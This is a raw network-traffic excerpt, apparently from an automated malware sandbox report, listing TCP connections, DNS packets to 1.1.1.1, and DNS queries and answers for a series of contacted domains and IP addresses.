Apr 24, 2024 09:22:46.369659901 CEST	49766	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:47.389291048 CEST	49767	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:47.696465969 CEST	80	49767	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:47.696629047 CEST	49767	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:47.702070951 CEST	49767	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:48.049422026 CEST	80	49767	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:48.389568090 CEST	80	49767	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:48.389627934 CEST	80	49767	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:48.389666080 CEST	80	49767	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:48.389708996 CEST	49767	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:48.389720917 CEST	80	49767	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:48.389759064 CEST	80	49767	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:48.389785051 CEST	49767	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:48.389796019 CEST	80	49767	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:48.389832973 CEST	80	49767	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:48.389847040 CEST	49767	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:48.389869928 CEST	80	49767	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:48.389905930 CEST	80	49767	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:48.389923096 CEST	49767	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:48.389942884 CEST	80	49767	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:48.389988899 CEST	49767	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:48.697103977 CEST	80	49767	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:48.697164059 CEST	80	49767	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:48.697200060 CEST	80	49767	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:48.697237968 CEST	80	49767	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:48.697273970 CEST	80	49767	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:48.697310925 CEST	80	49767	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:48.697346926 CEST	80	49767	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:48.697355032 CEST	49767	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:48.697355032 CEST	49767	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:48.697355032 CEST	49767	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:48.697381973 CEST	80	49767	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:48.697417974 CEST	80	49767	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:48.697423935 CEST	49767	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:48.697546005 CEST	49767	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:48.699898958 CEST	49767	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:49.008763075 CEST	80	49767	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:54.336275101 CEST	49768	80	192.168.2.4	103.168.172.37
Apr 24, 2024 09:22:54.557396889 CEST	80	49768	103.168.172.37	192.168.2.4
Apr 24, 2024 09:22:54.557471037 CEST	49768	80	192.168.2.4	103.168.172.37
Apr 24, 2024 09:22:54.559155941 CEST	49768	80	192.168.2.4	103.168.172.37
Apr 24, 2024 09:22:54.780344963 CEST	80	49768	103.168.172.37	192.168.2.4
Apr 24, 2024 09:22:54.782357931 CEST	80	49768	103.168.172.37	192.168.2.4
Apr 24, 2024 09:22:54.782407999 CEST	80	49768	103.168.172.37	192.168.2.4
Apr 24, 2024 09:22:54.782445908 CEST	49768	80	192.168.2.4	103.168.172.37
Apr 24, 2024 09:22:56.072828054 CEST	49768	80	192.168.2.4	103.168.172.37
Apr 24, 2024 09:22:57.094327927 CEST	49769	80	192.168.2.4	103.168.172.37
Apr 24, 2024 09:22:57.316277027 CEST	80	49769	103.168.172.37	192.168.2.4
Apr 24, 2024 09:22:57.318315983 CEST	49769	80	192.168.2.4	103.168.172.37
Apr 24, 2024 09:22:57.320230007 CEST	49769	80	192.168.2.4	103.168.172.37
Apr 24, 2024 09:22:57.541836977 CEST	80	49769	103.168.172.37	192.168.2.4
Apr 24, 2024 09:22:57.543808937 CEST	80	49769	103.168.172.37	192.168.2.4
Apr 24, 2024 09:22:57.543898106 CEST	80	49769	103.168.172.37	192.168.2.4
Apr 24, 2024 09:22:57.543981075 CEST	49769	80	192.168.2.4	103.168.172.37
Apr 24, 2024 09:22:58.822583914 CEST	49769	80	192.168.2.4	103.168.172.37
Apr 24, 2024 09:22:59.846240997 CEST	49770	80	192.168.2.4	103.168.172.37
Apr 24, 2024 09:23:00.068183899 CEST	80	49770	103.168.172.37	192.168.2.4
Apr 24, 2024 09:23:00.068299055 CEST	49770	80	192.168.2.4	103.168.172.37
Apr 24, 2024 09:23:00.075930119 CEST	49770	80	192.168.2.4	103.168.172.37
Apr 24, 2024 09:23:00.297458887 CEST	80	49770	103.168.172.37	192.168.2.4
Apr 24, 2024 09:23:00.297518015 CEST	80	49770	103.168.172.37	192.168.2.4
Apr 24, 2024 09:23:00.297549963 CEST	80	49770	103.168.172.37	192.168.2.4
Apr 24, 2024 09:23:00.297668934 CEST	80	49770	103.168.172.37	192.168.2.4
Apr 24, 2024 09:23:00.297700882 CEST	80	49770	103.168.172.37	192.168.2.4
Apr 24, 2024 09:23:00.297732115 CEST	80	49770	103.168.172.37	192.168.2.4
Apr 24, 2024 09:23:00.297784090 CEST	80	49770	103.168.172.37	192.168.2.4
Apr 24, 2024 09:23:00.297816992 CEST	80	49770	103.168.172.37	192.168.2.4
Apr 24, 2024 09:23:00.297848940 CEST	80	49770	103.168.172.37	192.168.2.4
Apr 24, 2024 09:23:00.300683975 CEST	80	49770	103.168.172.37	192.168.2.4
Apr 24, 2024 09:23:00.300787926 CEST	80	49770	103.168.172.37	192.168.2.4
Apr 24, 2024 09:23:00.300860882 CEST	49770	80	192.168.2.4	103.168.172.37
Apr 24, 2024 09:23:01.588316917 CEST	49770	80	192.168.2.4	103.168.172.37
Apr 24, 2024 09:23:03.122488022 CEST	49771	80	192.168.2.4	103.168.172.37
Apr 24, 2024 09:23:03.343806982 CEST	80	49771	103.168.172.37	192.168.2.4
Apr 24, 2024 09:23:03.344038963 CEST	49771	80	192.168.2.4	103.168.172.37
Apr 24, 2024 09:23:03.345491886 CEST	49771	80	192.168.2.4	103.168.172.37
Apr 24, 2024 09:23:03.566534042 CEST	80	49771	103.168.172.37	192.168.2.4
Apr 24, 2024 09:23:03.568514109 CEST	80	49771	103.168.172.37	192.168.2.4
Apr 24, 2024 09:23:03.568538904 CEST	80	49771	103.168.172.37	192.168.2.4
Apr 24, 2024 09:23:03.568669081 CEST	49771	80	192.168.2.4	103.168.172.37
Apr 24, 2024 09:23:03.571507931 CEST	49771	80	192.168.2.4	103.168.172.37
Apr 24, 2024 09:23:03.792536020 CEST	80	49771	103.168.172.37	192.168.2.4
Apr 24, 2024 09:23:08.808618069 CEST	49772	80	192.168.2.4	213.171.195.105
Apr 24, 2024 09:23:09.101135015 CEST	80	49772	213.171.195.105	192.168.2.4
Apr 24, 2024 09:23:09.101236105 CEST	49772	80	192.168.2.4	213.171.195.105
Apr 24, 2024 09:23:09.103707075 CEST	49772	80	192.168.2.4	213.171.195.105
Apr 24, 2024 09:23:09.396296024 CEST	80	49772	213.171.195.105	192.168.2.4
Apr 24, 2024 09:23:09.396332979 CEST	80	49772	213.171.195.105	192.168.2.4
Apr 24, 2024 09:23:09.396351099 CEST	80	49772	213.171.195.105	192.168.2.4
Apr 24, 2024 09:23:09.396414995 CEST	49772	80	192.168.2.4	213.171.195.105
Apr 24, 2024 09:23:10.620250940 CEST	49772	80	192.168.2.4	213.171.195.105
Apr 24, 2024 09:23:11.639231920 CEST	49773	80	192.168.2.4	213.171.195.105
Apr 24, 2024 09:23:11.933032990 CEST	80	49773	213.171.195.105	192.168.2.4
Apr 24, 2024 09:23:11.933140993 CEST	49773	80	192.168.2.4	213.171.195.105
Apr 24, 2024 09:23:11.935106993 CEST	49773	80	192.168.2.4	213.171.195.105
Apr 24, 2024 09:23:12.228774071 CEST	80	49773	213.171.195.105	192.168.2.4
Apr 24, 2024 09:23:12.228837013 CEST	80	49773	213.171.195.105	192.168.2.4
Apr 24, 2024 09:23:12.228872061 CEST	80	49773	213.171.195.105	192.168.2.4
Apr 24, 2024 09:23:12.229068995 CEST	49773	80	192.168.2.4	213.171.195.105
Apr 24, 2024 09:23:13.447609901 CEST	49773	80	192.168.2.4	213.171.195.105
Apr 24, 2024 09:23:14.466438055 CEST	49774	80	192.168.2.4	213.171.195.105
Apr 24, 2024 09:23:14.760925055 CEST	80	49774	213.171.195.105	192.168.2.4
Apr 24, 2024 09:23:14.764336109 CEST	49774	80	192.168.2.4	213.171.195.105
Apr 24, 2024 09:23:14.768378973 CEST	49774	80	192.168.2.4	213.171.195.105
Apr 24, 2024 09:23:15.062122107 CEST	80	49774	213.171.195.105	192.168.2.4
Apr 24, 2024 09:23:15.062172890 CEST	80	49774	213.171.195.105	192.168.2.4
Apr 24, 2024 09:23:15.062206984 CEST	80	49774	213.171.195.105	192.168.2.4
Apr 24, 2024 09:23:15.062239885 CEST	80	49774	213.171.195.105	192.168.2.4
Apr 24, 2024 09:23:15.062753916 CEST	80	49774	213.171.195.105	192.168.2.4
Apr 24, 2024 09:23:15.062829971 CEST	80	49774	213.171.195.105	192.168.2.4
Apr 24, 2024 09:23:15.062880039 CEST	49774	80	192.168.2.4	213.171.195.105
Apr 24, 2024 09:23:16.275826931 CEST	49774	80	192.168.2.4	213.171.195.105
Apr 24, 2024 09:23:17.294615984 CEST	49775	80	192.168.2.4	213.171.195.105
Apr 24, 2024 09:23:17.589163065 CEST	80	49775	213.171.195.105	192.168.2.4
Apr 24, 2024 09:23:17.589268923 CEST	49775	80	192.168.2.4	213.171.195.105
Apr 24, 2024 09:23:17.591944933 CEST	49775	80	192.168.2.4	213.171.195.105
Apr 24, 2024 09:23:17.886143923 CEST	80	49775	213.171.195.105	192.168.2.4
Apr 24, 2024 09:23:17.886183977 CEST	80	49775	213.171.195.105	192.168.2.4
Apr 24, 2024 09:23:17.886213064 CEST	80	49775	213.171.195.105	192.168.2.4
Apr 24, 2024 09:23:17.886240959 CEST	80	49775	213.171.195.105	192.168.2.4
Apr 24, 2024 09:23:17.886276960 CEST	80	49775	213.171.195.105	192.168.2.4
Apr 24, 2024 09:23:17.886354923 CEST	49775	80	192.168.2.4	213.171.195.105
Apr 24, 2024 09:23:17.891083002 CEST	49775	80	192.168.2.4	213.171.195.105
Apr 24, 2024 09:23:18.185163975 CEST	80	49775	213.171.195.105	192.168.2.4
Apr 24, 2024 09:23:23.303916931 CEST	49776	80	192.168.2.4	162.43.104.164
Apr 24, 2024 09:23:23.574476957 CEST	80	49776	162.43.104.164	192.168.2.4
Apr 24, 2024 09:23:23.574573994 CEST	49776	80	192.168.2.4	162.43.104.164
Apr 24, 2024 09:23:23.576973915 CEST	49776	80	192.168.2.4	162.43.104.164
Apr 24, 2024 09:23:23.847656965 CEST	80	49776	162.43.104.164	192.168.2.4
Apr 24, 2024 09:23:23.848611116 CEST	80	49776	162.43.104.164	192.168.2.4
Apr 24, 2024 09:23:23.848648071 CEST	80	49776	162.43.104.164	192.168.2.4
Apr 24, 2024 09:23:23.848685026 CEST	80	49776	162.43.104.164	192.168.2.4
Apr 24, 2024 09:23:23.848718882 CEST	49776	80	192.168.2.4	162.43.104.164
Apr 24, 2024 09:23:23.848783970 CEST	49776	80	192.168.2.4	162.43.104.164
Apr 24, 2024 09:23:25.088238955 CEST	49776	80	192.168.2.4	162.43.104.164
Apr 24, 2024 09:23:26.108401060 CEST	49777	80	192.168.2.4	162.43.104.164
Apr 24, 2024 09:23:26.377453089 CEST	80	49777	162.43.104.164	192.168.2.4
Apr 24, 2024 09:23:26.383946896 CEST	49777	80	192.168.2.4	162.43.104.164
Apr 24, 2024 09:23:26.383948088 CEST	49777	80	192.168.2.4	162.43.104.164
Apr 24, 2024 09:23:26.653291941 CEST	80	49777	162.43.104.164	192.168.2.4
Apr 24, 2024 09:23:26.654306889 CEST	80	49777	162.43.104.164	192.168.2.4
Apr 24, 2024 09:23:26.654349089 CEST	80	49777	162.43.104.164	192.168.2.4
Apr 24, 2024 09:23:26.654386044 CEST	80	49777	162.43.104.164	192.168.2.4
Apr 24, 2024 09:23:26.654686928 CEST	49777	80	192.168.2.4	162.43.104.164
Apr 24, 2024 09:23:27.885210991 CEST	49777	80	192.168.2.4	162.43.104.164
Apr 24, 2024 09:23:28.903199911 CEST	49778	80	192.168.2.4	162.43.104.164
Apr 24, 2024 09:23:29.174132109 CEST	80	49778	162.43.104.164	192.168.2.4
Apr 24, 2024 09:23:29.174340963 CEST	49778	80	192.168.2.4	162.43.104.164
Apr 24, 2024 09:23:29.176471949 CEST	49778	80	192.168.2.4	162.43.104.164
Apr 24, 2024 09:23:29.447362900 CEST	80	49778	162.43.104.164	192.168.2.4
Apr 24, 2024 09:23:29.447506905 CEST	80	49778	162.43.104.164	192.168.2.4
Apr 24, 2024 09:23:29.447540998 CEST	80	49778	162.43.104.164	192.168.2.4
Apr 24, 2024 09:23:29.448832989 CEST	80	49778	162.43.104.164	192.168.2.4
Apr 24, 2024 09:23:29.448873997 CEST	80	49778	162.43.104.164	192.168.2.4
Apr 24, 2024 09:23:29.448908091 CEST	80	49778	162.43.104.164	192.168.2.4
Apr 24, 2024 09:23:29.448945999 CEST	49778	80	192.168.2.4	162.43.104.164
Apr 24, 2024 09:23:29.449029922 CEST	49778	80	192.168.2.4	162.43.104.164
Apr 24, 2024 09:23:30.682135105 CEST	49778	80	192.168.2.4	162.43.104.164
Apr 24, 2024 09:23:31.701117039 CEST	49779	80	192.168.2.4	162.43.104.164
Apr 24, 2024 09:23:31.966361046 CEST	80	49779	162.43.104.164	192.168.2.4
Apr 24, 2024 09:23:31.966449022 CEST	49779	80	192.168.2.4	162.43.104.164
Apr 24, 2024 09:23:31.968274117 CEST	49779	80	192.168.2.4	162.43.104.164
Apr 24, 2024 09:23:32.233376026 CEST	80	49779	162.43.104.164	192.168.2.4
Apr 24, 2024 09:23:32.234499931 CEST	80	49779	162.43.104.164	192.168.2.4
Apr 24, 2024 09:23:32.234541893 CEST	80	49779	162.43.104.164	192.168.2.4
Apr 24, 2024 09:23:32.234579086 CEST	80	49779	162.43.104.164	192.168.2.4
Apr 24, 2024 09:23:32.234613895 CEST	80	49779	162.43.104.164	192.168.2.4
Apr 24, 2024 09:23:32.234772921 CEST	49779	80	192.168.2.4	162.43.104.164
Apr 24, 2024 09:23:32.234772921 CEST	49779	80	192.168.2.4	162.43.104.164
Apr 24, 2024 09:23:32.238240957 CEST	49779	80	192.168.2.4	162.43.104.164
Apr 24, 2024 09:23:32.505279064 CEST	80	49779	162.43.104.164	192.168.2.4
Apr 24, 2024 09:23:37.716831923 CEST	49780	80	192.168.2.4	84.32.84.32
Apr 24, 2024 09:23:37.876305103 CEST	80	49780	84.32.84.32	192.168.2.4
Apr 24, 2024 09:23:37.876396894 CEST	49780	80	192.168.2.4	84.32.84.32
Apr 24, 2024 09:23:37.878128052 CEST	49780	80	192.168.2.4	84.32.84.32
Apr 24, 2024 09:23:38.037426949 CEST	80	49780	84.32.84.32	192.168.2.4
Apr 24, 2024 09:23:38.037750006 CEST	80	49780	84.32.84.32	192.168.2.4
Apr 24, 2024 09:23:40.404592991 CEST	49781	80	192.168.2.4	84.32.84.32
Apr 24, 2024 09:23:40.564091921 CEST	80	49781	84.32.84.32	192.168.2.4
Apr 24, 2024 09:23:40.564312935 CEST	49781	80	192.168.2.4	84.32.84.32
Apr 24, 2024 09:23:40.568283081 CEST	49781	80	192.168.2.4	84.32.84.32
Apr 24, 2024 09:23:40.727627993 CEST	80	49781	84.32.84.32	192.168.2.4
Apr 24, 2024 09:23:40.727688074 CEST	80	49781	84.32.84.32	192.168.2.4
Apr 24, 2024 09:23:43.092216969 CEST	49782	80	192.168.2.4	84.32.84.32
Apr 24, 2024 09:23:43.251708984 CEST	80	49782	84.32.84.32	192.168.2.4
Apr 24, 2024 09:23:43.251799107 CEST	49782	80	192.168.2.4	84.32.84.32
Apr 24, 2024 09:23:43.254411936 CEST	49782	80	192.168.2.4	84.32.84.32
Apr 24, 2024 09:23:43.414201975 CEST	80	49782	84.32.84.32	192.168.2.4
Apr 24, 2024 09:23:43.414236069 CEST	80	49782	84.32.84.32	192.168.2.4
Apr 24, 2024 09:23:43.414350986 CEST	80	49782	84.32.84.32	192.168.2.4
Apr 24, 2024 09:23:45.778897047 CEST	49783	80	192.168.2.4	84.32.84.32
Apr 24, 2024 09:23:45.938327074 CEST	80	49783	84.32.84.32	192.168.2.4
Apr 24, 2024 09:23:45.938421011 CEST	49783	80	192.168.2.4	84.32.84.32
Apr 24, 2024 09:23:45.945234060 CEST	49783	80	192.168.2.4	84.32.84.32
Apr 24, 2024 09:23:46.104413986 CEST	80	49783	84.32.84.32	192.168.2.4
Apr 24, 2024 09:23:46.104816914 CEST	80	49783	84.32.84.32	192.168.2.4
Apr 24, 2024 09:23:46.104836941 CEST	80	49783	84.32.84.32	192.168.2.4
Apr 24, 2024 09:23:46.104856968 CEST	80	49783	84.32.84.32	192.168.2.4
Apr 24, 2024 09:23:46.104888916 CEST	80	49783	84.32.84.32	192.168.2.4
Apr 24, 2024 09:23:46.104918003 CEST	80	49783	84.32.84.32	192.168.2.4
Apr 24, 2024 09:23:46.105038881 CEST	80	49783	84.32.84.32	192.168.2.4
Apr 24, 2024 09:23:46.105057001 CEST	80	49783	84.32.84.32	192.168.2.4
Apr 24, 2024 09:23:46.105068922 CEST	49783	80	192.168.2.4	84.32.84.32
Apr 24, 2024 09:23:46.105068922 CEST	49783	80	192.168.2.4	84.32.84.32
Apr 24, 2024 09:23:46.105068922 CEST	49783	80	192.168.2.4	84.32.84.32
Apr 24, 2024 09:23:46.105073929 CEST	80	49783	84.32.84.32	192.168.2.4
Apr 24, 2024 09:23:46.105101109 CEST	80	49783	84.32.84.32	192.168.2.4
Apr 24, 2024 09:23:46.105133057 CEST	49783	80	192.168.2.4	84.32.84.32
Apr 24, 2024 09:23:46.105133057 CEST	49783	80	192.168.2.4	84.32.84.32
Apr 24, 2024 09:23:46.109450102 CEST	49783	80	192.168.2.4	84.32.84.32
Apr 24, 2024 09:23:46.268785000 CEST	80	49783	84.32.84.32	192.168.2.4
Apr 24, 2024 09:23:51.308007002 CEST	49784	80	192.168.2.4	3.33.130.190
Apr 24, 2024 09:23:51.467744112 CEST	80	49784	3.33.130.190	192.168.2.4
Apr 24, 2024 09:23:51.467956066 CEST	49784	80	192.168.2.4	3.33.130.190
Apr 24, 2024 09:23:51.470052004 CEST	49784	80	192.168.2.4	3.33.130.190
Apr 24, 2024 09:23:51.629641056 CEST	80	49784	3.33.130.190	192.168.2.4
Apr 24, 2024 09:23:51.653774977 CEST	80	49784	3.33.130.190	192.168.2.4
Apr 24, 2024 09:23:51.653956890 CEST	49784	80	192.168.2.4	3.33.130.190
Apr 24, 2024 09:23:52.982256889 CEST	49784	80	192.168.2.4	3.33.130.190
Apr 24, 2024 09:23:53.142018080 CEST	80	49784	3.33.130.190	192.168.2.4
Apr 24, 2024 09:23:53.997749090 CEST	49785	80	192.168.2.4	3.33.130.190
Apr 24, 2024 09:23:54.157404900 CEST	80	49785	3.33.130.190	192.168.2.4
Apr 24, 2024 09:23:54.157629967 CEST	49785	80	192.168.2.4	3.33.130.190
Apr 24, 2024 09:23:54.160886049 CEST	49785	80	192.168.2.4	3.33.130.190
Apr 24, 2024 09:23:54.320785999 CEST	80	49785	3.33.130.190	192.168.2.4
Apr 24, 2024 09:23:55.216720104 CEST	80	49785	3.33.130.190	192.168.2.4
Apr 24, 2024 09:23:55.216856956 CEST	49785	80	192.168.2.4	3.33.130.190
Apr 24, 2024 09:23:55.666469097 CEST	49785	80	192.168.2.4	3.33.130.190
Apr 24, 2024 09:23:55.826109886 CEST	80	49785	3.33.130.190	192.168.2.4
Apr 24, 2024 09:23:56.684775114 CEST	49786	80	192.168.2.4	3.33.130.190
Apr 24, 2024 09:23:56.844487906 CEST	80	49786	3.33.130.190	192.168.2.4
Apr 24, 2024 09:23:56.847392082 CEST	49786	80	192.168.2.4	3.33.130.190
Apr 24, 2024 09:23:56.847392082 CEST	49786	80	192.168.2.4	3.33.130.190
Apr 24, 2024 09:23:57.007302046 CEST	80	49786	3.33.130.190	192.168.2.4
Apr 24, 2024 09:23:57.007354021 CEST	80	49786	3.33.130.190	192.168.2.4
Apr 24, 2024 09:23:57.007386923 CEST	80	49786	3.33.130.190	192.168.2.4
Apr 24, 2024 09:23:57.007416964 CEST	80	49786	3.33.130.190	192.168.2.4
Apr 24, 2024 09:23:57.008203030 CEST	80	49786	3.33.130.190	192.168.2.4
Apr 24, 2024 09:23:57.008280993 CEST	80	49786	3.33.130.190	192.168.2.4
Apr 24, 2024 09:23:57.008312941 CEST	80	49786	3.33.130.190	192.168.2.4
Apr 24, 2024 09:23:57.008342981 CEST	80	49786	3.33.130.190	192.168.2.4
Apr 24, 2024 09:23:57.008373022 CEST	80	49786	3.33.130.190	192.168.2.4
Apr 24, 2024 09:23:57.031657934 CEST	80	49786	3.33.130.190	192.168.2.4
Apr 24, 2024 09:23:57.036262989 CEST	49786	80	192.168.2.4	3.33.130.190
Apr 24, 2024 09:23:58.358268023 CEST	49786	80	192.168.2.4	3.33.130.190
Apr 24, 2024 09:23:58.517967939 CEST	80	49786	3.33.130.190	192.168.2.4
Apr 24, 2024 09:23:59.373132944 CEST	49787	80	192.168.2.4	3.33.130.190
Apr 24, 2024 09:23:59.532906055 CEST	80	49787	3.33.130.190	192.168.2.4
Apr 24, 2024 09:23:59.532999992 CEST	49787	80	192.168.2.4	3.33.130.190
Apr 24, 2024 09:23:59.535301924 CEST	49787	80	192.168.2.4	3.33.130.190
Apr 24, 2024 09:23:59.694806099 CEST	80	49787	3.33.130.190	192.168.2.4
Apr 24, 2024 09:23:59.719516039 CEST	80	49787	3.33.130.190	192.168.2.4
Apr 24, 2024 09:23:59.719650030 CEST	49787	80	192.168.2.4	3.33.130.190
Apr 24, 2024 09:23:59.721091986 CEST	49787	80	192.168.2.4	3.33.130.190
Apr 24, 2024 09:23:59.880633116 CEST	80	49787	3.33.130.190	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 09:20:59.787067890 CEST	65139	53	192.168.2.4	1.1.1.1
Apr 24, 2024 09:21:00.286726952 CEST	53	65139	1.1.1.1	192.168.2.4
Apr 24, 2024 09:21:16.028850079 CEST	58737	53	192.168.2.4	1.1.1.1
Apr 24, 2024 09:21:16.381148100 CEST	53	58737	1.1.1.1	192.168.2.4
Apr 24, 2024 09:21:31.794785023 CEST	57122	53	192.168.2.4	1.1.1.1
Apr 24, 2024 09:21:31.990109921 CEST	53	57122	1.1.1.1	192.168.2.4
Apr 24, 2024 09:21:46.457108021 CEST	57627	53	192.168.2.4	1.1.1.1
Apr 24, 2024 09:21:46.653904915 CEST	53	57627	1.1.1.1	192.168.2.4
Apr 24, 2024 09:21:54.717632055 CEST	56285	53	192.168.2.4	1.1.1.1
Apr 24, 2024 09:21:55.197418928 CEST	53	56285	1.1.1.1	192.168.2.4
Apr 24, 2024 09:22:08.701230049 CEST	53168	53	192.168.2.4	1.1.1.1
Apr 24, 2024 09:22:09.713299990 CEST	53168	53	192.168.2.4	1.1.1.1
Apr 24, 2024 09:22:09.912384987 CEST	53	53168	1.1.1.1	192.168.2.4
Apr 24, 2024 09:22:09.912441969 CEST	53	53168	1.1.1.1	192.168.2.4
Apr 24, 2024 09:22:24.514667988 CEST	52870	53	192.168.2.4	1.1.1.1
Apr 24, 2024 09:22:24.820734024 CEST	53	52870	1.1.1.1	192.168.2.4
Apr 24, 2024 09:22:38.452553988 CEST	65456	53	192.168.2.4	1.1.1.1
Apr 24, 2024 09:22:38.808690071 CEST	53	65456	1.1.1.1	192.168.2.4
Apr 24, 2024 09:22:53.718252897 CEST	53787	53	192.168.2.4	1.1.1.1
Apr 24, 2024 09:22:54.333777905 CEST	53	53787	1.1.1.1	192.168.2.4
Apr 24, 2024 09:23:08.575841904 CEST	58241	53	192.168.2.4	1.1.1.1
Apr 24, 2024 09:23:08.805236101 CEST	53	58241	1.1.1.1	192.168.2.4
Apr 24, 2024 09:23:22.906243086 CEST	49505	53	192.168.2.4	1.1.1.1
Apr 24, 2024 09:23:23.301265001 CEST	53	49505	1.1.1.1	192.168.2.4
Apr 24, 2024 09:23:37.247575998 CEST	49758	53	192.168.2.4	1.1.1.1
Apr 24, 2024 09:23:37.714562893 CEST	53	49758	1.1.1.1	192.168.2.4
Apr 24, 2024 09:23:51.122417927 CEST	58351	53	192.168.2.4	1.1.1.1
Apr 24, 2024 09:23:51.304563999 CEST	53	58351	1.1.1.1	192.168.2.4
Apr 24, 2024 09:24:04.732909918 CEST	49523	53	192.168.2.4	1.1.1.1
Apr 24, 2024 09:24:04.947500944 CEST	53	49523	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 24, 2024 09:20:59.787067890 CEST	192.168.2.4	1.1.1.1	0x1040	Standard query (0)	www.xn--yzyp76d.com	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:21:16.028850079 CEST	192.168.2.4	1.1.1.1	0xd5a0	Standard query (0)	www.luckydomainz.shop	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:21:31.794785023 CEST	192.168.2.4	1.1.1.1	0x8e64	Standard query (0)	www.cd14j.us	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:21:46.457108021 CEST	192.168.2.4	1.1.1.1	0x4fc4	Standard query (0)	www.fashionagencylab.com	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:21:54.717632055 CEST	192.168.2.4	1.1.1.1	0x3d7c	Standard query (0)	www.happymarts.top	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:22:08.701230049 CEST	192.168.2.4	1.1.1.1	0x3b77	Standard query (0)	www.unchainedventure.com	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:22:09.713299990 CEST	192.168.2.4	1.1.1.1	0x3b77	Standard query (0)	www.unchainedventure.com	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:22:24.514667988 CEST	192.168.2.4	1.1.1.1	0xbb4	Standard query (0)	www.klconstructions.net	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:22:38.452553988 CEST	192.168.2.4	1.1.1.1	0xee5d	Standard query (0)	www.kakaobrain.us	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:22:53.718252897 CEST	192.168.2.4	1.1.1.1	0x4e43	Standard query (0)	www.celebration24.co.uk	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:23:08.575841904 CEST	192.168.2.4	1.1.1.1	0xf194	Standard query (0)	www.holein1sa.com	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:23:22.906243086 CEST	192.168.2.4	1.1.1.1	0x2822	Standard query (0)	www.shun-yamagata.com	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:23:37.247575998 CEST	192.168.2.4	1.1.1.1	0xe60b	Standard query (0)	www.carsinmultan.com	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:23:51.122417927 CEST	192.168.2.4	1.1.1.1	0xdd1e	Standard query (0)	www.threesomeapps.com	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:24:04.732909918 CEST	192.168.2.4	1.1.1.1	0x8191	Standard query (0)	www.jrksa.info	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 24, 2024 09:21:00.286726952 CEST	1.1.1.1	192.168.2.4	0x1040	No error (0)	www.xn--yzyp76d.com		47.76.62.167	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:21:16.381148100 CEST	1.1.1.1	192.168.2.4	0xd5a0	No error (0)	www.luckydomainz.shop	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 24, 2024 09:21:16.381148100 CEST	1.1.1.1	192.168.2.4	0xd5a0	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:21:31.990109921 CEST	1.1.1.1	192.168.2.4	0x8e64	No error (0)	www.cd14j.us		91.195.240.123	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:21:46.653904915 CEST	1.1.1.1	192.168.2.4	0x4fc4	Name error (3)	www.fashionagencylab.com	none	none	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:21:55.197418928 CEST	1.1.1.1	192.168.2.4	0x3d7c	No error (0)	www.happymarts.top		203.161.46.103	A (IP address)	IN (0x0001)	false
Apr 24, 2024 09:22:09.912384987 CEST	1.1.1.1	192.168.2.4	0x3b77	No error (0)	www.unchainedventure.com	unchainedventure.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 24, 2024 09:22:09.912384987 CEST	1.1.1.1	192.168.2.4	0x3b77	No error (0)	unchainedventure.com		195.242.88.141	A (IP address)	IN (0x0001)	false
